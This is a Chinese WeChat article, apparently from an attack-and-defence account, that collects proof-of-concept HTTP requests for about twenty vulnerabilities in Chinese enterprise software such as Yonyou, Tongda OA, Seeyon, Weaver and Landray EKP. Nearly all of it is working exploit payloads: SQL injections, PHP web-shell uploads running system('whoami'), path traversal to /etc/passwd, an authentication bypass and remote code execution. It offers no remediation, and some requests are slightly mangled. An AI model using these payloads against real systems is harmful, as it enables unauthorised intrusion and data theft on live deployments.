点击上方蓝字关注我们
原创声明
本文由[攻防实战指南]原创,版权所有。未经本公众号书面授权,禁止任何形式的转载、摘编、复制或建立镜像。如需转载,请联系我们,违反上述声明者,我们将依法追究其法律责任。
24
用友U8cloud MeasQueryConditionFrameAction 接口SQL注入漏洞
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.meas urequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID =1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
25
金和OA C6 GeneralXmlhttpPage.aspxSQL注入漏洞
GET /C6/Jhsoft.Web.appraise/AppraiseScoreUpdate.aspx/GeneralXmlhttpPage.aspx/?id =%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A4 HTTP/1.1
Host:
26
通达OA V11.10 login.php SQL注入漏洞
POST /ispirit/interface/login.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.855.2 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Host:
Content-Length: 107
name=123&pass=123&_SERVER[REMOTE_ADDR]=1','10',(select+@`,'`+or+if(1% 3d0,1,(select+~0%2b1))+limit+0,1))--+'
27
科讯校园一卡通管理系统 get_kq_tj_today SQL注入漏洞
GET /api/get_kq_tj_today?KaID=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
28
科讯校园一卡通管理系统 dormitoryHealthRanking SQL 注入漏洞
GET /api/dormitoryHealthRanking?building=1%27%3BWAITFOR+DELAY+%270%3A 0%3A5%27-- HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
29
云课网络科技有限公司云课网校系统 uploadImage接口 任意文件上传漏洞
POST /api/uploader/uploadImage HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 Cache-Control: no-cache
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9m
x-requested-with: XMLHttpRequest
Host:
Content-Length: 203
------WebKitFormBoundaryLZbmKeasWgo2gPtU
Content-Disposition: form-data; name="file"; filename="1G3311040N.php"
Content-Type: image/gif
phpinfo();
------WebKitFormBoundaryLZbmKeasWgo2gPtU--
30
WVP视频平台 push/list 未授权SQL注入漏洞
GET /api/push/list?page=1&count=15&query=1'&pushing=&mediaServerId= HTTP/1.1
Host:
31
致远OA ucpcLogin接口身份鉴权绕过漏洞
POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host:
UserAgentFrom=iphone&login_username=audit-admin&login_password=seeyon123456
32
Bazarr swaggerui组件目录穿越导致任意文件读取漏洞
GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host:
33
用友NC及U8cloudLoggingConfigServlet接口反序列化漏洞
使用 ysoserial 生成序列化数据
java -jar ysoserial.jar CommonsCollections6 "calc.exe" > obj.bin
POST /servlet/~ic/nc.bs.logging.config.LoggingConfigServlet HTTP/1.1
Host:
payload
34
泛微e-cology9 /services/WorkPlanService前台SQL注入漏洞
POST /services/WorkPlanService HTTP/1.1
HOST:
Content-Length: 430
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Host: 192.168.52.168
Referer: http://192.168.52.168:80/services/WorkPlanService
Cookie: ecology_JSessionid=aaawzto5mqug94J9Fz0cz
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
<soapenv:Header/> <soapenv:Body>
<web:deleteWorkPlan>
<!--type: string--> <web:in0>(SELECT 8544 FROM
(SELECT(SLEEP(3-(IF(27=27,0,5)))))NZeo)</web:in0> <!--type: int-->
<web:in1>22</web:in1> </web:deleteWorkPlan>
</soapenv:Body> </soapenv:Envelope>
35
1Panel 远程代码执行漏洞
GET /.git/config HTTP/1.1
User-Agent: test',"test", "test", "", "YmxvZy5tbzYwLmNu", "test", 0, "deny", 0, 1);ATTACH DATABASE '/www/sites/test/index/test.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo();');#
Connection: close
Host:
36
飞讯云 WMS /MyDown/MyImportData 前台 SQL 注入漏洞
GET /MyDown/MyImportData?opeid=72000301' HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=48887e3b-7976-4804-bb6c-17005cad41b1; Language=zh-CN
Connection: close
37
数字通云平台智慧政务 time SQL注入漏洞
GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=%28SELECT+4655 +FROM+%28SELECT%28SLEEP%285%29%29%29usQE%29 HTTP/1.1
Host:
User-Agent : Mozilla/5 .0 (Windows NT 10 .0; Win64; x64) AppleWebKit/537 .36 (KHTM
Accept-Encoding : gzip, deflate
Accept : */*
Connection : keep-alive
38
资管云 comfileup.php 前台文件上传漏洞
POST /comfileup.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,* /*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: cna=JtMCH7NgWFYCAXBg5XNzopCe
Upgrade-Insecure-Requests: 1
Priority: u=1
Content-Type: multipart/form-data; boundary=--------1110146050
Content-Length: 117
----------1110146050
Content-Disposition: form-data; name="file";filename="test.php"
test
----------1110146050--
39
蓝凌 EKP 远程代码执行漏洞
1、移动目录
GET /ekp/sys/ui/sys_ui_component/sysUiComponent.do?method=replaceExtend&ex tendId=../../../../resource/help/km/review/&folderName=../../../ekp/sys/common HTTP/1.1
Host:
2、利用 dataxml.jsp 执行任意代码
POST /ekp/resource/help/km/review/dataxml.jsp HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
s_bean=sysFormulaSimulateByJS&script=var x = Function/**/('return(java.lang.Runtime.getRuntime())')();x.exec("calc.exe");var a = mainOutput();function mainOutput() {};
40
赛蓝企业管理系统 DownloadBuilder 任意文件读取漏洞
GET /BaseModule/ReportManage/DownloadBuilder?filename=/../web.config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,* /*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
41
SuiteCRM responseEntryPoint SQL 注入漏洞
GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+S ELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1
Host:
42
用友 U8CRM import.php 任意文件上传漏洞
POST /crmtools/tools/import.php?DontCheckLogin=1&issubmit=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye0z8QbHs79gL8vW5
Content-Length: 295
------WebKitFormBoundarye0z8QbHs79gL8vW5 Content-Disposition: form-data; name="xfile"; filename="1.xls"
<?php system("whoami");unlink(__FILE__);?>
------WebKitFormBoundarye0z8QbHs79gL8vW5 Content-Disposition: form-data; name="combo"
rce.php
------WebKitFormBoundarye0z8QbHs79gL8vW5--
43
宏脉医疗DownLoadServerFile任意文件读取下载漏洞
P0ST /zh-CN/PublicInterface/DownLoadServerFile HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
filePath=c:windowswin.ini
扫码关注hw交流群
版权声明
本公众号所发布的文章仅代表作者个人观点,不代表本公众号立场。文章中的内容、图片、视频等资料,未经许可,不得用于商业用途。
转载或引用本公众号内容时,需注明来源,并保留本公众号的版权信息。
对于侵犯本公众号版权的行为,我们将保留采取法律手段追究的权利。
免责声明
本公众号提供的信息仅供参考,不构成任何形式的投资建议或专业意见。我们不对因使用本公众号内容而产生的任何损失承担责任。
原文始发于微信公众号(攻防实战指南):2024 HW POC(三)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论